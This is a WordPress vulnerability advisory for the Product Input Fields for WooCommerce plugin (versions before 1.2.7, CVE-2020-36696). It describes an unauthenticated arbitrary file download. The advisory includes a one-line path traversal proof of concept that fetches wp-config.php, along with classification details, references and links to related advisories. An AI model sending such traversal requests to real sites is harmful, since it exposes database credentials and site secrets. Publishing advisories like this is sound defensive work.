WordPress Plugin Vulnerabilities

Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download

Description

The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.

Proof of Concept

/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php

Affects Plugins

Plugin icon
product-input-fields-for-woocommerce
Fixed in 1.2.7

References

CVE
CVE-2020-36696
URL
https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
7.5 (high)

Miscellaneous

Original Researcher
Jerome Bruandet (nintechnet)
Verified
Yes
WPVDB ID
15f345e6-fc53-4bac-bc5a-de898181ea74

Timeline

Publicly Published
2020-08-03 (about 3 years ago)
Added
2020-08-03 (about 3 years ago)
Last Updated
2023-06-08 (about 11 months ago)

Other

Published
Title
Published
2022-05-18
Title
Jupiter < 6.10.2 & JupiterX < 2.0.7 - Subscriber+ Path Traversal and Local File Inclusion
Published
2020-09-22
Title
Coditor <= 1.1 - Arbitrary File Edition, Deletion and Internal Directory Listing in wp-content
Published
2021-05-26
Title
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Arbitrary Plugin Installation
Published
2024-02-27
Title
Under Construction / Maintenance Mode from Acurax <= 2.6 - Information Exposure
Published
2021-04-22
Title
Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User